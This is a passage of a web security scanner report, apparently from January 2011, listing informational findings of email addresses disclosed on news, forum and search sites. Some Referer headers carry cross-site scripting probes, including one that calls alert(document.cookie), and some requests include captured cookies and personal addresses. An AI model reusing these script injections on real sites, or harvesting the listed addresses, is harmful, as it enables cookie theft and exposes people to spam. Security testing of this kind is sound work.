Host: openchannel.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

26.47. http://recruiting.scout.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://recruiting.scout.com
Path:	/

Issue detail

The following email addresses were disclosed in the response:

brandonh@scout.com
jworthen@scout.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:18:16 GMT
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Accept-Ranges: bytes
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 02:28:16 GMT
Last-Modified: Sun, 30 Jan 2011 02:15:18 GMT
ETag: "1CBC02389E3FF00"
Content-Type: text/html
Content-Length: 280509

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Sc
...[SNIP]...
ed and The Sporting News and has been a featured guest on FSN Prime Ticket, FSN Northwest, The NFL Network, The MTN, Fox Sports Radio, Sporting News Radio and ESPN Radio as well. He can be reached at brandonh@scout.com and followed at twitter.com/brandonhuffman <a class="active" href="#profile-short-Huffman">
...[SNIP]...
ke Worthen has been with Scout.com since 2008. He currently works as a West Recruiting Analyst. In addition, he publishes the Washington high school site (hswashington.scout.com). He can be reached at jworthen@scout.com and followed at twitter.com/jacobworthen <a class="active" href="#profile-short-Worthen">
...[SNIP]...

26.48. http://redtape.msnbc.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://redtape.msnbc.com
Path:	/

Issue detail

The following email address was disclosed in the response:

BobSullivan@feedback.msnbc.com

Request

GET / HTTP/1.1
Host: redtape.msnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

26.49. http://rss.scout.com/rss.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rss.scout.com
Path:	/rss.aspx

Issue detail

The following email address was disclosed in the response:

info@scout.com

Request

GET /rss.aspx?sid=143 HTTP/1.1
Host: rss.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Server: Scoutweb4
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Content-Type: text/xml; charset=utf-8
Content-Length: 14278
Akamai: True
Cache-Control: private, max-age=819
Date: Sun, 30 Jan 2011 02:18:29 GMT
Connection: close
Akamai: True

<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xmlns:scout="http://www.scout.com/">
<channel>
<title>Scout.com > Scout.com</title>
<description>The latest news from Scout.c
...[SNIP]...
<managingEditor>info@scout.com</managingEditor>
...[SNIP]...
<webMaster>info@scout.com</webMaster>
...[SNIP]...

26.50. http://science.slashdot.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://science.slashdot.org
Path:	/

Issue detail

The following email address was disclosed in the response:

feedback@slashdot.org

Request

GET / HTTP/1.1
Host: science.slashdot.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/1.3.42 (Unix) mod_perl/1.31
SLASH_LOG_DATA: shtml
X-Powered-By: Slash 2.005001
X-Bender: In the event of an emergency, my ass can be used as a flotation device.
X-XRDS-Location: http://slashdot.org/slashdot.xrds
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 82642
Date: Sun, 30 Jan 2011 02:18:39 GMT
X-Varnish: 257579542
Age: 1
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>
<script id="before-content" type="text/javascript">
var pageload = {
pagemark: '490080280767515490',
before_content: (new Date).getTime()
};
function pageload
...[SNIP]...
<a href="mailto:feedback@slashdot.org" class="btn link opt">
...[SNIP]...

26.51. https://secure.shared.live.com/~Live.SiteContent.ID/~15.3.21/~/~/~/~/js/Main_WLStrings_JS1033.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://secure.shared.live.com
Path:	/~Live.SiteContent.ID/~15.3.21/~/~/~/~/js/Main_WLStrings_JS1033.js

Issue detail

The following email address was disclosed in the response:

example555@hotmail.com

Request

GET /~Live.SiteContent.ID/~15.3.21/~/~/~/~/js/Main_WLStrings_JS1033.js HTTP/1.1
Host: secure.shared.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Thu, 14 Oct 2010 02:08:56 GMT
Server: Microsoft-IIS/7.5
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
Expires: Wed, 01 Jan 2020 08:00:00 GMT
Date: Sat, 29 Jan 2011 23:13:40 GMT
Content-Length: 9084
Connection: close

/* Copyright (C) 2010 Microsoft Corporation */g_s["b24"]="sign in";g_s["a0"]="Cancel";g_s["a1"]="Click a Windows Live ID to sign in";g_s["a2"]="Retype your password";g_s["a3"]="Sign in with a partner
...[SNIP]...
correctly.";g_s["b25"]="Other Windows Live IDs";g_s["b52"]="Sign in with a Single use code";g_s["b54"]="Sign in with a Windows Live Hotmail ID";g_s["ii19"]="Password";g_s["ii12"]="Cancel";g_s["ii3"]="example555@hotmail.com";g_s["ii2"]="Windows Live ID:";g_s["ii13"]="Sign in with enhanced security. This may slow your browser speed.";g_s["ii14"]="Use enhanced security (SSL)";g_s["ii11"]="Sign in";g_s["ii9"]="Remember my p
...[SNIP]...
sword is incorrect. Please try again.";g_s["p21"]="Forget me";g_s["o11"]="Don't remember this Windows Live ID.";g_s["o1"]="Alert symbol";g_s["012"]="Sign-in options";g_s["y23"]="Partner ID";g_s["y3"]="example555@hotmail.com";g_s["y2"]="Windows Live ID:";g_s["y4"]="Password:";g_s["y5"]="Forgot your password?";g_s["y6"]="Messenger:";g_s["y8"]="Remember me";g_s["y10"]="Cancel";g_s["y12"]="Use enhanced security (SSL)";g_s["y
...[SNIP]...
gned in";g_s["y22"]="Please type your email address in the format yourname@example.com.";g_s["y0"]="Error symbol";g_s["y1"]="Generic Federation Error Message";g_s["dd35"]="Single use code";g_s["dd5"]="example555@hotmail.com";g_s["dd4"]="Windows Live ID:";g_s["dd6"]="Enter the code";g_s["dd7"]="Request a code";g_s["dd9"]="If you request a new single use code, the previous code won't work. Are you sure you want to refresh
...[SNIP]...

26.52. http://sstatic.net/Js/third-party/jquery.typewatch.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sstatic.net
Path:	/Js/third-party/jquery.typewatch.js

Issue detail

The following email address was disclosed in the response:

team@stackoverflow.com

Request

GET /Js/third-party/jquery.typewatch.js HTTP/1.1
Host: sstatic.net
Proxy-Connection: keep-alive
Referer: http://stackoverflow.com/tags
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 503 Service Unavailable
Cache-Control: no-cache
Connection: close
Content-Type: text/html

<html>
<head>
<title>Too Many Requests - Stack Overflow</title>
</head>
<body style="font-family:Arial,Helvetica,sans-serif;">
<div style="margin: 0 auto; width: 960px;">
<h
...[SNIP]...
<a href="mailto:team@stackoverflow.com">
...[SNIP]...

26.53. http://sstatic.net/Js/third-party/openid-jquery.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sstatic.net
Path:	/Js/third-party/openid-jquery.js

Issue detail

The following email address was disclosed in the response:

team@stackoverflow.com

Request

GET /Js/third-party/openid-jquery.js?v=7 HTTP/1.1
Host: sstatic.net
Proxy-Connection: keep-alive
Referer: http://stackoverflow.com/users/login?returnurl=%2fusers
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

26.54. http://sstatic.net/Js/wmd.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sstatic.net
Path:	/Js/wmd.js

Issue detail

The following email address was disclosed in the response:

team@stackoverflow.com

Request

Response

26.55. http://sstatic.net/js/master.min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sstatic.net
Path:	/js/master.min.js

Issue detail

The following email address was disclosed in the response:

team@stackoverflow.com

Request

Response

26.56. http://sstatic.net/js/question.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sstatic.net
Path:	/js/question.js

Issue detail

The following email address was disclosed in the response:

team@stackoverflow.com

Request

GET /js/question.js?v=46e26c3f9a63 HTTP/1.1
Host: sstatic.net
Proxy-Connection: keep-alive
Referer: http://stackoverflow.com/questions/4843433/php-facebook-like-box-being-able-to-like-the-current-page-using-dynamic-url
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

26.57. http://sstatic.net/openid.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sstatic.net
Path:	/openid.css

Issue detail

The following email address was disclosed in the response:

team@stackoverflow.com

Request

GET /openid.css?v=3 HTTP/1.1
Host: sstatic.net
Proxy-Connection: keep-alive
Referer: http://stackoverflow.com/users/login?returnurl=%2fusers
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

26.58. http://sstatic.net/stackoverflow/all.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sstatic.net
Path:	/stackoverflow/all.css

Issue detail

The following email address was disclosed in the response:

team@stackoverflow.com

Request

GET /stackoverflow/all.css?v=90776b57f91f HTTP/1.1
Host: sstatic.net
Proxy-Connection: keep-alive
Referer: http://stackoverflow.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

26.59. http://sstatic.net/stackoverflow/img/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sstatic.net
Path:	/stackoverflow/img/favicon.ico

Issue detail

The following email address was disclosed in the response:

team@stackoverflow.com

Request

GET /stackoverflow/img/favicon.ico HTTP/1.1
Host: sstatic.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

26.60. http://stackoverflow.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://stackoverflow.com
Path:	/

Issue detail

The following email address was disclosed in the response:

team@stackoverflow.com

Request

Response

26.61. http://stackoverflow.com/posts/4843433/ivc/3344 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://stackoverflow.com
Path:	/posts/4843433/ivc/3344

Issue detail

The following email address was disclosed in the response:

team@stackoverflow.com

Request

GET /posts/4843433/ivc/3344 HTTP/1.1
Host: stackoverflow.com
Proxy-Connection: keep-alive
Referer: http://stackoverflow.com/questions/4843433/php-facebook-like-box-being-able-to-like-the-current-page-using-dynamic-url
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gauthed=1; __qca=P0-251589161-1296400348182; __utmz=140029553.1296400348.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=140029553.594979447.1296400348.1296400348.1296400348.1; __utmc=140029553; __utmb=140029553.1.10.1296400348

Response

26.62. http://stackoverflow.com/questions previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://stackoverflow.com
Path:	/questions

Issue detail

The following email address was disclosed in the response:

team@stackoverflow.com

Request

Response

26.63. http://stackoverflow.com/questions/4843433/php-facebook-like-box-being-able-to-like-the-current-page-using-dynamic-url previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://stackoverflow.com
Path:	/questions/4843433/php-facebook-like-box-being-able-to-like-the-current-page-using-dynamic-url

Issue detail

The following email address was disclosed in the response:

team@stackoverflow.com

Request

Response

26.64. http://stackoverflow.com/tags previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://stackoverflow.com
Path:	/tags

Issue detail

The following email address was disclosed in the response:

team@stackoverflow.com

Request

Response

26.65. http://stackoverflow.com/users previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://stackoverflow.com
Path:	/users

Issue detail

The following email address was disclosed in the response:

team@stackoverflow.com

Request

Response

26.66. http://stackoverflow.com/users/login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://stackoverflow.com
Path:	/users/login

Issue detail

The following email address was disclosed in the response:

team@stackoverflow.com

Request

Response

26.67. http://stackoverflow.com/users/login/global/request previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://stackoverflow.com
Path:	/users/login/global/request

Issue detail

The following email address was disclosed in the response:

team@stackoverflow.com

Request

POST /users/login/global/request HTTP/1.1
Host: stackoverflow.com
Proxy-Connection: keep-alive
Referer: http://stackoverflow.com/users/login?returnurl=%2fusers
Origin: http://stackoverflow.com
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-251589161-1296400348182; __utmz=140029553.1296400348.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=140029553.594979447.1296400348.1296400348.1296400348.1; __utmc=140029553; __utmb=140029553.4.10.1296400348; gauthed=1
Content-Length: 0

Response

26.68. http://technolog.msnbc.redacted/security previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/security

Issue detail

The following email addresses were disclosed in the response:

TSA.OCR-ExternalCompliance@dhs.gov
TSAComplaints@eff.org
civil.liberties@dhs.gov

Request

Response

26.69. http://technolog.msnbc.redacted/video previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/video

Issue detail

The following email address was disclosed in the response:

ideas@hpeprintlive.com

Request

Response

26.70. http://technolog.msnbc.redacted/viral previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/viral

Issue detail

The following email address was disclosed in the response:

ideas@hpeprintlive.com

Request

Response

26.71. http://technolog.msnbc.redacted/youtube previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/youtube

Issue detail

The following email address was disclosed in the response:

ideas@hpeprintlive.com

Request

Response

26.72. http://thelastword.msnbc.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://thelastword.msnbc.redacted
Path:	/

Issue detail

The following email address was disclosed in the response:

thelastword@msnbc.com

Request

GET / HTTP/1.1
Host: thelastword.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

26.73. http://timheuer.com/blog/articles/getting-started-with-silverlight-development.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://timheuer.com
Path:	/blog/articles/getting-started-with-silverlight-development.aspx

Issue detail

The following email address was disclosed in the response:

pintoam@hotmail.com

Request

Response

26.74. http://today.msnbc.redacted/id/37616868 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://today.msnbc.msn.com
Path:	/id/37616868

Issue detail

The following email address was disclosed in the response:

name@address.com

Request

GET /id/37616868 HTTP/1.1
Host: today.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

26.75. http://today.msnbc.redacted/id/41319614/ns/today-entertainment/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://today.msnbc.msn.com
Path:	/id/41319614/ns/today-entertainment/

Issue detail

The following email address was disclosed in the response:

name@address.com

Request

GET /id/41319614/ns/today-entertainment/ HTTP/1.1
Host: today.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

26.76. http://wbenedetti.newsvine.com/_util/spellcheck/broken-notebook-2.6/cpaint2.inc.compressed.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wbenedetti.newsvine.com
Path:	/_util/spellcheck/broken-notebook-2.6/cpaint2.inc.compressed.js

Issue detail

The following email addresses were disclosed in the response:

dstender@st-webdevelopment.de
wiley14@gmail.com

Request

GET /_util/spellcheck/broken-notebook-2.6/cpaint2.inc.compressed.js HTTP/1.1
Host: wbenedetti.newsvine.com
Proxy-Connection: keep-alive
Referer: http://wbenedetti.newsvine.com/?2efa1%22-alert(1)-%22fb67b00e4a1=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sprout=2_PqiLNG8SFmQW8X%2BSbvHhIaQDDrylppT5AYg38YcbZ9nVTR8kG5RsiVu%2Byu1tJBD9uostGX%2FgO7wgSaC9LY0BxepgpfVGhwtOvjqbjk9G%2F0aWJY3jKGNJFq0uN4pAaO2V7eJc%2FrvMgTEqRy9ueckdj0wQyfJmL0oh4o9pwBcp9RbpE129gAZ0vY9RD8lhmoOR3DT1xy5pJRukUI4myv8AbN7gTgSVWGrjBguMbtU2gBmjNsA9C6eGORSajKZnC%2B%2B0; s_cc=true; s_sq=%5B%5BB%5D%5D; vid=45f73cc22cc66ac775a363e022c73cd5

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 17:20:53 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Fri, 31 Oct 2008 15:18:25 GMT
ETag: "125c49d-2f1b-45a8e1bcb3240"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Sun, 06 Feb 2011 17:20:53 GMT
Vary: Accept-Encoding
Content-Type: text/javascript
Connection: Keep-Alive
Content-Length: 12059

/**
* CPAINT - Cross-Platform Asynchronous INterface Toolkit
*
* http://cpaint.sourceforge.net
*
* released under the terms of the LGPL
* see http://www.fsf.org/licensing/licenses/lgpl.txt for
...[SNIP]...
<wiley14@gmail.com>
...[SNIP]...
<dstender@st-webdevelopment.de>
...[SNIP]...

26.77. http://webreflection.blogspot.com/2007/08/global-scope-evaluation-and-dom.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://webreflection.blogspot.com
Path:	/2007/08/global-scope-evaluation-and-dom.html

Issue detail

The following email address was disclosed in the response:

nicolas@framework2.com.ar

Request

Response

26.78. http://www.bing.com/s/osd3.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/s/osd3.xml

Issue detail

The following email address was disclosed in the response:

msosa@microsoft.com

Request

GET /s/osd3.xml HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Fri, 29 May 2009 19:00:47 GMT
ETag: 76EA0033E4279EAF87C4514EAD7F4163000002E2
Cache-Control: public, max-age=2993376
Content-Length: 738
Date: Sat, 29 Jan 2011 23:53:31 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8"?>
<OpenSearchDescription xmlns="http://a9.com/-/spec/opensearch/1.1/">
<ShortName>Bing</ShortName>
<Tags>Bing</Tags>
<Description>Bing. Search b
...[SNIP]...
<Contact>msosa@microsoft.com</Contact>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.blackvoices.com
Path:	/$\|http:/latino.aol.com/$\|.ivillage.com.*/1\|www.ivillage.com/(celeb-news\|entertainment-photos\|tv\|for-kids\|video\|entertainment\|movies\|food\|recipes\|table-talk\|food-for-kids\|food-advice\|food-news\|food-video

Issue detail

The following email address was disclosed in the response:

rik.robinson@platform-a.com

Request

GET /$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1
Host: www.blackvoices.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

26.80. http://www.bloglines.com/contact/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bloglines.com
Path:	/contact/

Issue detail

The following email address was disclosed in the response:

bloglines@merchantcircle.com

Request

GET /contact/ HTTP/1.1
Host: www.bloglines.com
Proxy-Connection: keep-alive
Referer: http://www.bloglines.com/sub/?fc6fa%3Cscript%3Ealert(1)%3C/script%3E715c72a1043=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html
ETag: "1645232186"
Last-Modified: Thu, 16 Dec 2010 18:16:39 GMT
Content-Length: 9098
Date: Sun, 30 Jan 2011 17:21:22 GMT
Server: lighttpd/1.4.26

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>

<title>Bloglines | Contact Us</title>
<meta http-equiv="Content
...[SNIP]...
<a href="mailto:bloglines@merchantcircle.com">bloglines@merchantcircle.com</a>
...[SNIP]...

26.81. http://www.bloglines.com/js/r200702160/bl/home.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bloglines.com
Path:	/js/r200702160/bl/home.js

Issue detail

The following email address was disclosed in the response:

bloglines@merchantcircle.com

Request

GET /js/r200702160/bl/home.js HTTP/1.1
Host: www.bloglines.com
Proxy-Connection: keep-alive
Referer: http://www.bloglines.com/sub/?fc6fa%3Cscript%3Ealert(document.cookie)%3C/script%3E715c72a1043=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/javascript
Accept-Ranges: bytes
ETag: "1465341435"
Last-Modified: Wed, 01 Dec 2010 01:13:52 GMT
Content-Length: 5128
Date: Sun, 30 Jan 2011 01:53:12 GMT
Server: lighttpd/1.4.26

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Bl
...[SNIP]...
<a href="mailto:bloglines@merchantcircle.com">bloglines@merchantcircle.com</a>
...[SNIP]...

26.82. http://www.collectspace.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.collectspace.com
Path:	/

Issue detail

The following email addresses were disclosed in the response:

contact@collectspace.com
subscribe@collectspace.com

Request

GET / HTTP/1.1
Host: www.collectspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/html; charset=UTF-8
Date: Sun, 30 Jan 2011 03:05:28 GMT
Accept-Ranges: bytes
Connection: close
Set-Cookie: X-Mapping-caklakng=BB42101B5313E42DA76A9065185BD7FC; path=/
Last-Modified: Sat, 29 Jan 2011 15:33:04 GMT
Content-Length: 35661

<HTML>
<HEAD>
<META NAME="description" CONTENT="Source for space history, space artifacts, and space memorabilia. Learn where astronauts will appear, browse collecting guides, and read original space
...[SNIP]...
<a href="mailto:subscribe@collectspace.com">subscribe@collectspace.com</a>
...[SNIP]...
<a href="mailto:contact@collectspace.com"><FONT COLOR="#999999" FACE="sans-serif" SIZE="-2">contact@collectspace.com</FONT>
...[SNIP]...

26.83. http://www.dailygrail.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dailygrail.com
Path:	/

Issue detail

The following email address was disclosed in the response:

userhelp@dailygrail.com

Request

GET / HTTP/1.1
Host: www.dailygrail.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

26.84. http://www.delish.com/food/recalls-reviews/its-not-bakery-its-digiorno previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.delish.com
Path:	/food/recalls-reviews/its-not-bakery-its-digiorno

Issue detail

The following email address was disclosed in the response:

katie.delish@gmail.com

Request

Response

26.85. http://www.everyblock.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.everyblock.com
Path:	/

Issue detail

The following email address was disclosed in the response:

feedback@everyblock.com

Request

GET / HTTP/1.1
Host: www.everyblock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sun, 30 Jan 2011 03:05:36 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 13518
Last-Modified: Thu, 30 Dec 2010 18:49:16 GMT
Connection: close
Vary: Accept-Encoding
Expires: Sun, 30 Jan 2011 04:05:36 GMT
Cache-Control: max-age=3600
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
<title>EveryBlock ... A news feed for your block</title>
<meta http-equiv="Content-Ty
...[SNIP]...
rror: function(XMLHttpRequest, textStatus, errorThrown) {
$j('#feedbackstatus').html("Whoops! We're experiencing some technical hiccups. If you're not too frustrated by this, please e-mail us at feedback@everyblock.com instead.");
$j('#cr-form').slideToggle();
},
success: function(data, textStatus) {
$j('#feedbackstatus').html("Success! Thanks for taking the time to suggest your city. We'
...[SNIP]...

26.86. http://www.gnu.org/licenses/gpl.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gnu.org
Path:	/licenses/gpl.html

Issue detail

The following email addresses were disclosed in the response:

gnu@gnu.org
web-translators@gnu.org
webmasters@gnu.org
you@example.com

Request

GET /licenses/gpl.html HTTP/1.1
Host: www.gnu.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:23:53 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=0
Expires: Sat, 29 Jan 2011 23:23:53 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 50254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
